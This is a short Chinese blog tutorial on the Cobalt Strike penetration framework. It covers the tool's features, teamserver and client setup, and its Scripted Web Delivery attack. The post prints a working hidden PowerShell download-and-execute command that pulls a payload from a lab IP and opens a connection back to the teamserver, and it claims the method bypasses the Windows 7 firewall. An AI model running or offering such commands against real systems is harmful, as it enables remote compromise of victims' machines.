1. 简介

  Cobalt Strike: C/S架构的商业渗透软件,适合多人进行团队协作,可模拟APT做模拟对抗,进行内网渗透。

  Cobalt Strike 一款GUI的框架式渗透工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等。

  Cobalt Strike整体功能了解参考

 

   客户端(clinet gui

    团队成员使用的图形化界面

  服务器(Team Server

    生成攻击载荷(payload

    下载攻击代码(会在服务器设置的端口上提供攻击代码下载)

    监听器(端口监听)

    Team Server 日志记录 保存在logs文件夹

    支持团队协同操作

  运行坏境

    服务器(Team Serverkali linux   

    客户端clinetjava开发跨平台(安装jre即可使用 )

 

2. 安装

  这里以cobalt strike 3.14版本为例

  将文件分别解压到kali和Windows主机中。在kali里面,运行:

1 ./teamserver 本机ip 自定义密码

 

来创建Team Server端。

  然后运行:

1 ./cobaltstrike 

进入gui界面,输入相应的信息(ip为127.0.0.1即可)后即可进入。

  windows端,运行cobaltstrike.bat,然后输入相应的信息也可进入gui界面。

 

3. 反向恶意web脚本连接teamserver

  a. 点击工具栏中的耳机按钮,下方就进入了Listener选项卡。然后添加监听器(Listener)。

  b. 然后选择Attacks -- Web Drive-by -- Scripted Web Delivery。填入相应的参数,URI Path就是存放恶意shell的地方。

  c. 让靶机执行生成的代码,例如这里是:

1 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.43.106:8888/a'))"

在靶机的shell上执行该语句,即可获得Web Delivery。

  有关Web Delivery,详见:如何使用Metasploit的Web Delivery Script和命令注入弹出Shell(翻译) - 知乎 (zhihu.com)

  经过测试,这种方式有效的绕过了win7的防火墙:

 

posted on 2021-10-13 20:49  EndlessShw  阅读(164)  评论(0编辑  收藏  举报